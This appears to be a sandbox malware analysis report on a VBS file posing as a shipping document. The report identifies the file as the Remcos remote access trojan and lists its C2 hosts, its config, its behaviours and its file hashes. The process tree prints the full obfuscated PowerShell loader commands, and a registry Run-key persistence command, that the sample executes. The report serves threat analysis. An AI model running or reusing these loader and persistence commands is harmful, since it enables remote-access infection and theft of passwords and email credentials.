Overview

overview

10

Static

static

1

awb_shippi...24.vbs

windows7-x64

10

awb_shippi...24.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-11-2024 07:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    awb_shipping_post_27112024224782020031808174CN27112024000001124.vbs

  • Size

    29KB

  • MD5

    2bd1468a7b92abec901b765e0096bb54

  • SHA1

    e82a0cf23beaf7b9082713f8c35bfbbac5aa9578

  • SHA256

    1d90d341b6aac839d683afe80e3ec87b73564abcdbb205fee5ba795f34af5db8

  • SHA512

    2a69b75c1d978394b8aa50e68359c7df7b5f65c0df410e2051bb71f4e7ae5d630d9d243e700cf11a156aef508613e15086a973f2cf218da653de80f2c0de0847

  • SSDEEP

    192:CBH/B1eRFrh86O1oFnZS1VvttRSPQUmKGTT3I8eEnUxMPzduNZQ7ilOHVMp4Vm5D:+a7VQ9jTbX3RM5wiz9g93U4j4bw4TZ02

Score
10/10
remcosa$iancollectiondiscoverypersistencerat

Malware Config

Extracted

Family

remcos

Botnet

A$ian

C2

iwarsut775laudryed1.duckdns.org:57484

iwarsut775laudryed1.duckdns.org:57483

iwarsut775laudryed2.duckdns.org:57484

iwarsut775laudryed3.duckdns.org:57484
Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    hmbnspt.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    shibuetgtst-CR733Q

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 7 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_post_27112024224782020031808174CN27112024000001124.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • System Network Configuration Discovery: Internet Connection Discovery
    • Suspicious use of WriteProcessMemory
    PID:1548
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$attributlinien='Ugudeligste118';;$Manfred0='Skumleris';;$Bondage='Terraces';;$Brachycera='katakinetomeric';;$Tvangsfjernelses='Miskicks';;$Shieldlessness=$host.Name;function Smokingjakkernes($Bhutaneren){If ($Shieldlessness) {$Forfgtelse=5} for ($Folen189=$Forfgtelse;;$Folen189+=6){if(!$Bhutaneren[$Folen189]) { break }$Datamngde+=$Bhutaneren[$Folen189]}$Datamngde}function Treddle($Gnawings248){ .($trannens) ($Gnawings248)}$Klimaer=Smokingjakkernes 'UndaznfebruEBaguetHelmh.CambiWCivilEVlgerbFo,teCDomssL evalimidteEMagi N MonoT';$Orante=Smokingjakkernes 'Pl.tyMAtmomoT,komz ,megiTrifolUnevalFn sla T pc/';$afparerer=Smokingjakkernes 'RaughT P,oblBaronsAfkna1 Styr2';$Sheathlike=' skri[Pan oNGu,loe SamtTFerma. terrSSyninESubh.rHalvnvKarteiKnudecDamseEstemmPobtruOmimesiUnreanSkatttSupermChezsaMoro.nsengeABeramg HaraEErfarRParke]Bedro: Floc: Hu ds .soaeChondCNervsUDy.eprSem tITheont BairYHillepzonkeRBefj,o Sup t FreeoSk ivc BalaoUnsorLStala=Unpai$ t lsa Bi,rF H,pppOphveAprodurTransEHjem,r,iskeEbraatr';$Orante+=Smokingjakkernes 'Haemu5ordsg.Anden0 Emen Sulta(Pre rW Uk,ii NontnRetsodForkooNaboew Hrecs,erde TangeNCous.TForv Ho o1Elkas0Aorta.Sav a0Em ro;.ntra B.llW DrifiThom n nowl6 Jing4Ete n;,gern kuffxTutun6Slug,4Sonar;decou ,abelrCha,kvGudbr:Komma1Bums.3Stig 1Whit .,olyp0Lutin)Apant S queGContueSkolecTo nykBistao Koke/Gcell2 unne0Opvis1Punga0 Ca n0Va.me1Ledet0 teri1Snyde VejtrFAggraiA visrPr ceeUnguefIn rgo MoslxJetpi/S,oun1Nappe3Skraa1Rigse.Calam0';$Hariolation=Smokingjakkernes 'Ch liuGlickSDisagEPsychr teer-Bouboa.atergUdskreS,iddnOlfe T';$sodapastillernes=Smokingjakkernes 'Sjkleh UndetJalapt.erivpSve isSekti:ation/lysin/detergVen la Rendr Prish booko TrimuEpuradSlyngjkon.moBlse,uNusserMiliemGenn .Traf.c Ha,noBa anmT ipl/Da.spm ByzoaTveden ururn Tilsir.klatti,baoKar,olSkud .Sk ftiAdsc.n inglf';$Solsejlet=Smokingjakkernes 'Eks.g>';$trannens=Smokingjakkernes 'KafirIOverseForm.X';$Cer='Eskadreronings';$Lament='\Geografens.Mis';Treddle (Smokingjakkernes ' Pseu$ cadeGGirlelWaldeo iconbSlo pa Bewil Ungd: Kem sGaz akLectuyIriagGBen.ag OrthEAmputMUbicaORef.eRPretoeImageL Lngd= dmar$ immEGeniunLogomvSmoor: StorA Mosep verpAp,iod odnoApolitTGiddyA rbej+ fort$ParallTypegARe mamA.moneIndlrn Catat');Treddle (Smokingjakkernes 'Snitf$Burgog Pin LStigeOAlexaBR,ppoa FoghlOp.pa:BordcpBin slPerseAK lons Het TmorphRDigebeReconn Edi.dOscineInnocsbrist= Imbl$Prgnis Theto,urvadKulegaUansvpurha Aau.ocS Bibltn ntrI UltrlHowdiLRecome RkkeR.orosnFlytteA ophSCap i.Ben osMoi apSalg.LAnalyiBok eT Psy,(Subun$Fist S ncloLeverlTiggesLat,he .camJF.ernLJ uncEtheriT Af,o)');Treddle (Smokingjakkernes $Sheathlike);$sodapastillernes=$Plastrendes[0];$Morphophonemics=(Smokingjakkernes 'Killi$SkglaGProj LCacodo S.rib Fi kAOphthlP nar: pstaR rngeukardasGaldtTRaadhKRejsea oentMOverbROpkloEDiver=jenf,NTry.nEVelcrw Mula-UdladOSneezb.prrej FetieUnallc ReintPa af OverSForfiytortuSPavilt gnbeRegn,MDiscu.inter$DeconKMelodLOversiTrummMT lkmACl.arEKolesr');Treddle ($Morphophonemics);Treddle (Smokingjakkernes ' Post$Oly pr rndeuEllets ilitt Sag kSvmmeaUnimpmKlikkrSinkce yth.BibliH.jedoe BirtaSurged andeK nderGotissLaryn[ Meta$ Stj H rynaMenulrpacifiAf kro B drlAsminaaa.detGeneri Plano un.rnBrass] Wo k=Penin$OccipOEntenr Naboa NgnenMusiktR,mune');$delustering=Smokingjakkernes ' Ener$ R,ndrFiniouTroldsBa kbtNonbokSammea Su,emBrun rUdebaeBerta. ,edtD CogioLi,htw Co.snUdtaglRatifoFlle aSemotdMortiFParali .kamlEncroe Tops( airn$ Ugess.astnoTvr.kd eknia ndicp DispaJokessNonuptPinchiDulselStvn.l FraneArrivrsnurrnEthyleVi iasHarne,Su,er$o iedAS rinlHa utiBrepom Skabe BlusnTrykstArbalaWent tinteli Sbreo.askin,ftaseberegrMinianTe nee Sluts Unpr)';$Alimentationernes=$Skyggemorel;Treddle (Smokingjakkernes 'befit$SkalkgHaandlMiscoobe ribSpri.aUdbrul Occl: SubgtMirjaaDeocupje doNTimbeI Mod nFyrvrgGrandESkrivRfastan LageEBrshaSSemi.=Inv.s(aort t Wa geVirusS.ylieTEarth-TilripHomo,aAntreTMedich Tran A kla$Dame AGaalgLB skvIPart m PolieUnaccNdagletNummeaBardetTaa,eiBrugeOAvancn la ie,aroeRJulebN.aasyeFunkts Yn.e)');while (!$tapningernes) {Treddle (Smokingjakkernes 'Grovv$FinmegLyksal reveoPerisb FireaGrumsl Palu:Die,eDReprei PinanS.eeduIndtgsUfo e=Gener$InterG C fio GesewKapitl') ;Treddle $delustering;Treddle (Smokingjakkernes 'CitroSRugosTDiverARets RModeot Pann-Af tusOxydel agerERentvESpankpTro p Spiro4');Treddle (Smokingjakkernes 'Inter$Sabbagspndil Cemeo Sam bKulkaASo delSortk: Ogh tFooteaHulkoPComplN T eniPartinSteveg CoveeSkydeR ydronRedoxeEpigoS Fart=Unesc(T,esaTScoptEGrfteSCipput onog- UnskpEmbryA MissTP,oviHSipho H,per$SkammA Apotl TreaiBioasMPantaeUnreonVit.cTGeronA MasutLayabIAlkovOR.guan Thi E olaRGalvaNInvilEFleawSOv ri)') ;Treddle (Smokingjakkernes 'Dansk$ Fo egBite LPincuOSk beBIrereaStrabLU,att: RestkDevieo TingnReri kGodelUS rumrConvorTesseeSmiderSelefeFinmas Sco.=Gentl$FelttG fteLUtilgo halvBBartlAUnchaLArres:CakebkCamelLanlgsiRebatpHeartP PregEUd.ajsHal lKStrikRDeteknLindoT D,meESirliRTaktfn A snEPerso3Spili7Lands+ Sub.+ phys%Refer$IditoPret.eLelemeaT kroS HandtQuadrRKl rkeInte nTilstdOrthoEAuspisBand .AffilCSolutO RatiuMetreNReitet') ;$sodapastillernes=$Plastrendes[$Konkurreres]}$Mouldier=290646;$Nickolajs=32703;Treddle (Smokingjakkernes 'Seg l$ beviGSuperlVanddoLysa bForviAFamislEmuls:P opeH OpslE Am nbJinksRM ddiE DikeWT,ntidP eusOBarnemRecad Oc po=Hjade ProviGpe iaeKderytskede- MickcProceO Vo yN evigTUnculEBen inAimfutF emh kul,u$ KorrAS perLChianIStudeMSmaabE Psyknkik.eTAffatAForbrt,tereIBenigo,dresNbevidE esboRYamskNS.ocheunderS');Treddle (Smokingjakkernes 'Aaben$BortfgRem.sl Om,tosygefbproa.aspejll Bjrn:noninF jemlaCarricBandao CayenSq.irsAfsentTrimee HernnBogyssNdsfa N nt=Sysop Fler[L koeSNon,ey IllusLe,ettCoveneC eckmK efa. oxteCUkraio RicknHvervvArg.meNyderrAnti tOrie ] Omko:Sq am: rspaFTreddrguldgoPhytomDirigBTerria ybstsDraabeForbu6Nurse4BlselSLicentAlmg rAcro iBjrnenSpe mgElli,(Titre$BndslHTheekedron.bCu tnrZygi.e S luwModerdOpruso.ociamOverb)');Treddle (Smokingjakkernes 'Resis$RustbGSe.vpLPigebO ProdBTriamaAurael Cyli:Ever SCivilhSpartASemeidBr geePukleTS,igmaO.stniTaverlMouly Blgek=Unfav Dyble[SkaftSHnderyPun tsFremmtBrevoEBombeMMesos.Reco,tLnm dEUnneixac eltPuerp.Bes,jEArmbrnDivotCbasilOReappdTubboIdiannNprivaGUvuli]progr: To g:AnbriaEm,lssInconcSmileiGangtIAdfrd.RepatgstillE LitutFidiaSP ssiTH emaRHuge itilbjnRejseGS yts(Spejl$ ,pdaFLingea Gun CMult OTubbiNOmgivSBlan.tEsta EDisconMadonS D mo)');Treddle (Smokingjakkernes 'Boner$ boliGInc uLDepreo KakiBFalanAHenfalS,pra: SlipUSphyrN poplDUntapeHsltfRAutomfUndanIShan.lPreprLTilba=Hadic$SkattsEjsakhCa paAElec.DSauroe.vereTEelboAI coriGtranlDeerh.Slhu SNonseu EntebProgrSlill,TDunlirH rebIMilj N TorsG F,rb( Base$ Mo.iM ForsONo,diu aa.eLEndeldInoffiUnpuceStillrCardi,Morta$arbejNTradiISyntec TrudK iolioFredsL FaelaExegeJRepr s Fanf)');Treddle $Underfill;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4052
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$attributlinien='Ugudeligste118';;$Manfred0='Skumleris';;$Bondage='Terraces';;$Brachycera='katakinetomeric';;$Tvangsfjernelses='Miskicks';;$Shieldlessness=$host.Name;function Smokingjakkernes($Bhutaneren){If ($Shieldlessness) {$Forfgtelse=5} for ($Folen189=$Forfgtelse;;$Folen189+=6){if(!$Bhutaneren[$Folen189]) { break }$Datamngde+=$Bhutaneren[$Folen189]}$Datamngde}function Treddle($Gnawings248){ .($trannens) ($Gnawings248)}$Klimaer=Smokingjakkernes 'UndaznfebruEBaguetHelmh.CambiWCivilEVlgerbFo,teCDomssL evalimidteEMagi N MonoT';$Orante=Smokingjakkernes 'Pl.tyMAtmomoT,komz ,megiTrifolUnevalFn sla T pc/';$afparerer=Smokingjakkernes 'RaughT P,oblBaronsAfkna1 Styr2';$Sheathlike=' skri[Pan oNGu,loe SamtTFerma. terrSSyninESubh.rHalvnvKarteiKnudecDamseEstemmPobtruOmimesiUnreanSkatttSupermChezsaMoro.nsengeABeramg HaraEErfarRParke]Bedro: Floc: Hu ds .soaeChondCNervsUDy.eprSem tITheont BairYHillepzonkeRBefj,o Sup t FreeoSk ivc BalaoUnsorLStala=Unpai$ t lsa Bi,rF H,pppOphveAprodurTransEHjem,r,iskeEbraatr';$Orante+=Smokingjakkernes 'Haemu5ordsg.Anden0 Emen Sulta(Pre rW Uk,ii NontnRetsodForkooNaboew Hrecs,erde TangeNCous.TForv Ho o1Elkas0Aorta.Sav a0Em ro;.ntra B.llW DrifiThom n nowl6 Jing4Ete n;,gern kuffxTutun6Slug,4Sonar;decou ,abelrCha,kvGudbr:Komma1Bums.3Stig 1Whit .,olyp0Lutin)Apant S queGContueSkolecTo nykBistao Koke/Gcell2 unne0Opvis1Punga0 Ca n0Va.me1Ledet0 teri1Snyde VejtrFAggraiA visrPr ceeUnguefIn rgo MoslxJetpi/S,oun1Nappe3Skraa1Rigse.Calam0';$Hariolation=Smokingjakkernes 'Ch liuGlickSDisagEPsychr teer-Bouboa.atergUdskreS,iddnOlfe T';$sodapastillernes=Smokingjakkernes 'Sjkleh UndetJalapt.erivpSve isSekti:ation/lysin/detergVen la Rendr Prish booko TrimuEpuradSlyngjkon.moBlse,uNusserMiliemGenn .Traf.c Ha,noBa anmT ipl/Da.spm ByzoaTveden ururn Tilsir.klatti,baoKar,olSkud .Sk ftiAdsc.n inglf';$Solsejlet=Smokingjakkernes 'Eks.g>';$trannens=Smokingjakkernes 'KafirIOverseForm.X';$Cer='Eskadreronings';$Lament='\Geografens.Mis';Treddle (Smokingjakkernes ' Pseu$ cadeGGirlelWaldeo iconbSlo pa Bewil Ungd: Kem sGaz akLectuyIriagGBen.ag OrthEAmputMUbicaORef.eRPretoeImageL Lngd= dmar$ immEGeniunLogomvSmoor: StorA Mosep verpAp,iod odnoApolitTGiddyA rbej+ fort$ParallTypegARe mamA.moneIndlrn Catat');Treddle (Smokingjakkernes 'Snitf$Burgog Pin LStigeOAlexaBR,ppoa FoghlOp.pa:BordcpBin slPerseAK lons Het TmorphRDigebeReconn Edi.dOscineInnocsbrist= Imbl$Prgnis Theto,urvadKulegaUansvpurha Aau.ocS Bibltn ntrI UltrlHowdiLRecome RkkeR.orosnFlytteA ophSCap i.Ben osMoi apSalg.LAnalyiBok eT Psy,(Subun$Fist S ncloLeverlTiggesLat,he .camJF.ernLJ uncEtheriT Af,o)');Treddle (Smokingjakkernes $Sheathlike);$sodapastillernes=$Plastrendes[0];$Morphophonemics=(Smokingjakkernes 'Killi$SkglaGProj LCacodo S.rib Fi kAOphthlP nar: pstaR rngeukardasGaldtTRaadhKRejsea oentMOverbROpkloEDiver=jenf,NTry.nEVelcrw Mula-UdladOSneezb.prrej FetieUnallc ReintPa af OverSForfiytortuSPavilt gnbeRegn,MDiscu.inter$DeconKMelodLOversiTrummMT lkmACl.arEKolesr');Treddle ($Morphophonemics);Treddle (Smokingjakkernes ' Post$Oly pr rndeuEllets ilitt Sag kSvmmeaUnimpmKlikkrSinkce yth.BibliH.jedoe BirtaSurged andeK nderGotissLaryn[ Meta$ Stj H rynaMenulrpacifiAf kro B drlAsminaaa.detGeneri Plano un.rnBrass] Wo k=Penin$OccipOEntenr Naboa NgnenMusiktR,mune');$delustering=Smokingjakkernes ' Ener$ R,ndrFiniouTroldsBa kbtNonbokSammea Su,emBrun rUdebaeBerta. ,edtD CogioLi,htw Co.snUdtaglRatifoFlle aSemotdMortiFParali .kamlEncroe Tops( airn$ Ugess.astnoTvr.kd eknia ndicp DispaJokessNonuptPinchiDulselStvn.l FraneArrivrsnurrnEthyleVi iasHarne,Su,er$o iedAS rinlHa utiBrepom Skabe BlusnTrykstArbalaWent tinteli Sbreo.askin,ftaseberegrMinianTe nee Sluts Unpr)';$Alimentationernes=$Skyggemorel;Treddle (Smokingjakkernes 'befit$SkalkgHaandlMiscoobe ribSpri.aUdbrul Occl: SubgtMirjaaDeocupje doNTimbeI Mod nFyrvrgGrandESkrivRfastan LageEBrshaSSemi.=Inv.s(aort t Wa geVirusS.ylieTEarth-TilripHomo,aAntreTMedich Tran A kla$Dame AGaalgLB skvIPart m PolieUnaccNdagletNummeaBardetTaa,eiBrugeOAvancn la ie,aroeRJulebN.aasyeFunkts Yn.e)');while (!$tapningernes) {Treddle (Smokingjakkernes 'Grovv$FinmegLyksal reveoPerisb FireaGrumsl Palu:Die,eDReprei PinanS.eeduIndtgsUfo e=Gener$InterG C fio GesewKapitl') ;Treddle $delustering;Treddle (Smokingjakkernes 'CitroSRugosTDiverARets RModeot Pann-Af tusOxydel agerERentvESpankpTro p Spiro4');Treddle (Smokingjakkernes 'Inter$Sabbagspndil Cemeo Sam bKulkaASo delSortk: Ogh tFooteaHulkoPComplN T eniPartinSteveg CoveeSkydeR ydronRedoxeEpigoS Fart=Unesc(T,esaTScoptEGrfteSCipput onog- UnskpEmbryA MissTP,oviHSipho H,per$SkammA Apotl TreaiBioasMPantaeUnreonVit.cTGeronA MasutLayabIAlkovOR.guan Thi E olaRGalvaNInvilEFleawSOv ri)') ;Treddle (Smokingjakkernes 'Dansk$ Fo egBite LPincuOSk beBIrereaStrabLU,att: RestkDevieo TingnReri kGodelUS rumrConvorTesseeSmiderSelefeFinmas Sco.=Gentl$FelttG fteLUtilgo halvBBartlAUnchaLArres:CakebkCamelLanlgsiRebatpHeartP PregEUd.ajsHal lKStrikRDeteknLindoT D,meESirliRTaktfn A snEPerso3Spili7Lands+ Sub.+ phys%Refer$IditoPret.eLelemeaT kroS HandtQuadrRKl rkeInte nTilstdOrthoEAuspisBand .AffilCSolutO RatiuMetreNReitet') ;$sodapastillernes=$Plastrendes[$Konkurreres]}$Mouldier=290646;$Nickolajs=32703;Treddle (Smokingjakkernes 'Seg l$ beviGSuperlVanddoLysa bForviAFamislEmuls:P opeH OpslE Am nbJinksRM ddiE DikeWT,ntidP eusOBarnemRecad Oc po=Hjade ProviGpe iaeKderytskede- MickcProceO Vo yN evigTUnculEBen inAimfutF emh kul,u$ KorrAS perLChianIStudeMSmaabE Psyknkik.eTAffatAForbrt,tereIBenigo,dresNbevidE esboRYamskNS.ocheunderS');Treddle (Smokingjakkernes 'Aaben$BortfgRem.sl Om,tosygefbproa.aspejll Bjrn:noninF jemlaCarricBandao CayenSq.irsAfsentTrimee HernnBogyssNdsfa N nt=Sysop Fler[L koeSNon,ey IllusLe,ettCoveneC eckmK efa. oxteCUkraio RicknHvervvArg.meNyderrAnti tOrie ] Omko:Sq am: rspaFTreddrguldgoPhytomDirigBTerria ybstsDraabeForbu6Nurse4BlselSLicentAlmg rAcro iBjrnenSpe mgElli,(Titre$BndslHTheekedron.bCu tnrZygi.e S luwModerdOpruso.ociamOverb)');Treddle (Smokingjakkernes 'Resis$RustbGSe.vpLPigebO ProdBTriamaAurael Cyli:Ever SCivilhSpartASemeidBr geePukleTS,igmaO.stniTaverlMouly Blgek=Unfav Dyble[SkaftSHnderyPun tsFremmtBrevoEBombeMMesos.Reco,tLnm dEUnneixac eltPuerp.Bes,jEArmbrnDivotCbasilOReappdTubboIdiannNprivaGUvuli]progr: To g:AnbriaEm,lssInconcSmileiGangtIAdfrd.RepatgstillE LitutFidiaSP ssiTH emaRHuge itilbjnRejseGS yts(Spejl$ ,pdaFLingea Gun CMult OTubbiNOmgivSBlan.tEsta EDisconMadonS D mo)');Treddle (Smokingjakkernes 'Boner$ boliGInc uLDepreo KakiBFalanAHenfalS,pra: SlipUSphyrN poplDUntapeHsltfRAutomfUndanIShan.lPreprLTilba=Hadic$SkattsEjsakhCa paAElec.DSauroe.vereTEelboAI coriGtranlDeerh.Slhu SNonseu EntebProgrSlill,TDunlirH rebIMilj N TorsG F,rb( Base$ Mo.iM ForsONo,diu aa.eLEndeldInoffiUnpuceStillrCardi,Morta$arbejNTradiISyntec TrudK iolioFredsL FaelaExegeJRepr s Fanf)');Treddle $Underfill;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1808
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3404
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Beregningsudtryks" /t REG_EXPAND_SZ /d "%Fdselsattester223% -windowstyle 1 $Delkrederekontoen=(gp -Path 'HKCU:\Software\Poliomyelitises\').Affettuosos;%Fdselsattester223% ($Delkrederekontoen)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3872
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Beregningsudtryks" /t REG_EXPAND_SZ /d "%Fdselsattester223% -windowstyle 1 $Delkrederekontoen=(gp -Path 'HKCU:\Software\Poliomyelitises\').Affettuosos;%Fdselsattester223% ($Delkrederekontoen)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1340
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ydccetfdvrobbrlhzsftnpsnfkssmzzwax"
        3⤵
          PID:3392
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ydccetfdvrobbrlhzsftnpsnfkssmzzwax"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4736
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\jxhnel"
          3⤵
          • Accesses Microsoft Outlook accounts
          • System Location Discovery: System Language Discovery
          PID:864
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\lzmgfeayxh"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3740

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      2d74f3420d97c3324b6032942f3a9fa7

      SHA1

      95af9f165ffc370c5d654a39d959a8c4231122b9

      SHA256

      8937b96201864340f7fae727ff0339d0da2ad23c822774ff8ff25afa2ae4da3d

      SHA512

      3c3d2ae3b2581ff32cfee2aedca706e4eaa111a1f9baeb9f022762f7ef2dfb6734938c39eb17974873ad01a4760889e81a7b45d7ed404eb5830f73eb23737f1a

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qlsjl3iw.obv.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\ydccetfdvrobbrlhzsftnpsnfkssmzzwax
      Filesize

      4KB

      MD5

      ac300aeaf27709e2067788fdd4624843

      SHA1

      e98edd4615d35de96e30f1a0e13c05b42ee7eb7b

      SHA256

      d2637d58bb120dc6fefe2f38d6e0d4b308006b8639106a7f9e915fa80b5cc9d9

      SHA512

      09c46e708f9d253dccd4d943639d9f8126f868ae3dcd951aad12222bb98b5d3814676f878c8391b9bdab5dedcf5b9e9eaeb2ad3ffec57bda875198735586d4df

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Geografens.Mis
      Filesize

      421KB

      MD5

      213e02988b4d838fdbf175c96f49eefb

      SHA1

      29190ed3fd5aa65328b312cfa952a95c752297b0

      SHA256

      1d198b573d3f3715ab7066d7d42eb11c0f69c542d055f6f73abc5cc4d7b82429

      SHA512

      b815a41b58ff9d204f53d2ee8fca3327f916b0b0d65c154a59a0b46026ad6a3784b074cc361be3535e3b421ef8e4b2cf4b222050f9f1b3a15481f1d2fe6bb55a

      Download Submit

    • memory/864-65-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

      Download

    • memory/864-67-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

      Download

    • memory/864-60-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

      Download

    • memory/1808-43-0x0000000007960000-0x00000000079F6000-memory.dmp

      Filesize

      600KB

      Download

    • memory/1808-47-0x00000000090F0000-0x000000000D2E5000-memory.dmp

      Filesize

      66.0MB

      Download

    • memory/1808-25-0x00000000057E0000-0x0000000005802000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1808-26-0x0000000005F00000-0x0000000005F66000-memory.dmp

      Filesize

      408KB

      Download

    • memory/1808-27-0x0000000005F70000-0x0000000005FD6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/1808-33-0x00000000060A0000-0x00000000063F4000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/1808-23-0x0000000002DC0000-0x0000000002DF6000-memory.dmp

      Filesize

      216KB

      Download

    • memory/1808-39-0x00000000066B0000-0x00000000066CE000-memory.dmp

      Filesize

      120KB

      Download

    • memory/1808-40-0x00000000066E0000-0x000000000672C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/1808-41-0x0000000007F10000-0x000000000858A000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/1808-42-0x0000000006C30000-0x0000000006C4A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/1808-24-0x0000000005860000-0x0000000005E88000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/1808-44-0x00000000078F0000-0x0000000007912000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1808-45-0x0000000008B40000-0x00000000090E4000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/3404-78-0x0000000022910000-0x0000000022929000-memory.dmp

      Filesize

      100KB

      Download

    • memory/3404-54-0x0000000000A00000-0x0000000001C54000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/3404-79-0x0000000022910000-0x0000000022929000-memory.dmp

      Filesize

      100KB

      Download

    • memory/3404-75-0x0000000022910000-0x0000000022929000-memory.dmp

      Filesize

      100KB

      Download

    • memory/3740-61-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/3740-72-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/3740-71-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/4052-19-0x00007FFC4F9C0000-0x00007FFC50481000-memory.dmp

      Filesize

      10.8MB

      Download

